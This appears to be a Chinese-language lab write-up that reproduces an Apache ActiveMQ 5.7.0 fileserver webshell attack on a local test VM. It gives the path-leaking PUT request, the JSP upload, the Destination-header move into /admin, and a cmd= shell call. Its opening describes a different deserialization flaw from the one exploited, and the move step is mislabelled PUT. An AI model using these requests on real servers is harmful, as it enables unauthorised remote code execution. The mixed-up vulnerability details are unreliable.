漏洞說明
Apache ActiveMQ是美國阿帕奇(Apache)軟件基金會所研發的一套開源的消息中間件,它支持Java消息服務,集羣,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,該漏洞源於程序沒有限制可在代理中序列化的類。遠程攻擊者可藉助特製的序列化的Java消息服務(JMS)ObjectMessage對象利用該漏洞執行任意代碼。
1、ActiveMQ默認開啓PUT MOVE等不安全的http方法
2、ActiveMQ的file server允許客戶通過PUT上傳文件
環境搭建
window 7 IP地址爲192.168.17.173
配置java環境變量,下載jre
https://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html
雙擊運行一路下一步,然後配置環境變量。
可參考https://jingyan.baidu.com/article/6dad5075d1dc40a123e36ea3.html
下載有漏洞版本的ActiveMQ,這裏下載的是5.7.0
地址爲http://activemq.apache.org/download-archives.html
解壓打開進入bin目錄雙擊activemq啓動
訪問http://192.168.17.173:8161/admin/
自此環境搭建成功
打開Burp suite抓包
PUT /fileserver/a…/…/%08/…%08/.%08/%08 HTTP/1.1
爆出絕對路徑
寫入jsp代碼
移動
上傳shell時,file server中是沒有執行權限的,需要移動到admin中才能執行shell
PUT /fileserver/test.jsp HTTP/1.1
Destination: file:C:/Users/ruan/Desktop/apache-activemq-5.7.0/webapps/admin/test.jsp
訪問http://192.168.17.173:8161/admin/test.jsp?cmd=calc
